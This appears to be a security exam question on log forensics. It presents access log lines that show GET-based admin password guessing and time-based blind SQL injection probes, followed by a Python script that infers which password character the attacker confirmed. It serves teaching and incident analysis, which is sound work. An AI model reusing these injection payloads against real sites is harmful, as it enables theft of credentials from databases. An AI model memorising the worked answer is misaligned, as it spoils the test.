A website was compromised by an attacker; afterwards, a security engineer obtained the site's web server access ...

Published on 2022-03-02 16:50:29

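A website was compromised by an attacker. Afterwards, a security engineer obtained the access log of the site's web server for analysis. The question lists 7 suspicious log entries in chronological order; analyze them and answer the questions below: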

172.17.0.1 [27/May/2019:07:32:52 +0000] "GET /admin.php?username=admin&password=1234567890 HTTP/1.1" 200 284 "-" "Mozilla/5.0 (X11 Linux x86_64 rv:60.0) Gecko/20100101 Firefox/60.0"

172.17.0.1 [27/May/2019:07:32:53 +0000] "GET /admin.php?username=admin&password=michael HTTP/1.1" 200 284 "-" "Mozilla/5.0 (X11 Linux x86_64 rv:60.0) Gecko/20100101 Firefox/60.0"

172.17.0.1 [27/May/2019:07:32:58 +0000] "GET /admin.php?username=admin&password=654321 HTTP/1.1" 200 284 "-" "Mozilla/5.0 (X11 Linux x86_64 rv:60.0) Gecko/20100101 Firefox/60.0"

172.17.0.1 [27/May/2019:08:41:44 +0000] "GET /index.php?con=admin&act=index HTTP/1.1" 200 7718 "http://10.22.2.199/index.php?con=admin&act=payment_list" "Mozilla/5.0 (X11 Linux x86_64 rv:60.0) Gecko/20100101 Firefox/60.0"

172.17.0.1 [27/May/2019:08:41:57 +0000] "GET /index.php?con=goods&act=set_online&status=0&id=12)%20and%20if(substr((select%20password%20from%20tiny_user%20limit%200,1),1,1)='9',sleep(3),0)%23 HTTP/1.1" 302 - "-" "python-requests/2.20.0"

172.17.0.1 [27/May/2019:08:41:57 +0000] "GET /index.php?con=goods&act=set_online&status=0&id=12)%20and%20if(substr((select%20password%20from%20tiny_user%20limit%200,1),1,1)='a',sleep(3),0)%23 HTTP/1.1" 302 - "-" "python-requests/2.20.0"

172.17.0.1 [27/May/2019:08:42:00 +0000] "GET /index.php?con=goods&act=set_online&status=0&id=12)%20and%20if(substr((select%20password%20from%20tiny_user%20limit%200,1),2,1)='0',sleep(3),0)%23 HTTP/1.1" 302 - "-" "python-requests/2.20.0"

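(1) Judging from the log, which types of attack is the attacker attempting against this website?

(2) Judging from the first 4 log entries, which piece of the site administrator's sensitive information did the attacker obtain? Explain your reasoning and the evidence for it.

(3) Judging from the last 3 log entries, which single character did the attacker successfully verify? Explain your reasoning and the evidence for it.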
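The triage a responder would apply to the last three entries, as an added example that is not part of the original question: it extracts each `substr(...)='c',sleep(n)` probe and flags a guess as confirmed when the next request arrives at least `n` seconds later. It assumes the client sends requests one after another and that the logged time is when the request was received (Apache's default `%t`); the function names are hypothetical.

```python
import re
from datetime import datetime
from urllib.parse import unquote

# The last three entries of the log quoted in the question, copied verbatim.
LOG = r"""
172.17.0.1 [27/May/2019:08:41:57 +0000] "GET /index.php?con=goods&act=set_online&status=0&id=12)%20and%20if(substr((select%20password%20from%20tiny_user%20limit%200,1),1,1)='9',sleep(3),0)%23 HTTP/1.1" 302 - "-" "python-requests/2.20.0"
172.17.0.1 [27/May/2019:08:41:57 +0000] "GET /index.php?con=goods&act=set_online&status=0&id=12)%20and%20if(substr((select%20password%20from%20tiny_user%20limit%200,1),1,1)='a',sleep(3),0)%23 HTTP/1.1" 302 - "-" "python-requests/2.20.0"
172.17.0.1 [27/May/2019:08:42:00 +0000] "GET /index.php?con=goods&act=set_online&status=0&id=12)%20and%20if(substr((select%20password%20from%20tiny_user%20limit%200,1),2,1)='0',sleep(3),0)%23 HTTP/1.1" 302 - "-" "python-requests/2.20.0"
""".strip().splitlines()

# Fields needed from each entry: the timestamp and the request URL.
ENTRY = re.compile(r'^\S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<url>\S+) ')
# if(substr(<subquery>,<pos>,1)='<char>',sleep(<n>),0) in the URL-decoded request.
PROBE = re.compile(r"substr\(.*,(\d+),1\)='(.)',sleep\((\d+)\)", re.I)


def parse_probes(lines):
    """Return (timestamp, position, guessed_char, sleep_seconds) for each probe."""
    probes = []
    for line in lines:
        entry = ENTRY.match(line)
        probe = PROBE.search(unquote(entry.group("url"))) if entry else None
        if probe:
            ts = datetime.strptime(entry.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
            probes.append((ts, int(probe.group(1)), probe.group(2), int(probe.group(3))))
    return probes


def confirmed_guesses(probes):
    """A guess counts as confirmed when the following request is delayed by the
    injected sleep. Assumption: sequential client, timestamps taken at request
    arrival. The last probe has no successor and stays undetermined."""
    hits = []
    for (ts, pos, ch, delay), (next_ts, *_) in zip(probes, probes[1:]):
        if (next_ts - ts).total_seconds() >= delay:
            hits.append((pos, ch))
    return hits


if __name__ == "__main__":
    for pos, ch in confirmed_guesses(parse_probes(LOG)):
        print(f"position {pos}: {ch!r} confirmed by response delay")
```

Access-log timestamps have one-second resolution, so the gap is a heuristic; here it is corroborated by the third request moving on to character position 2.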
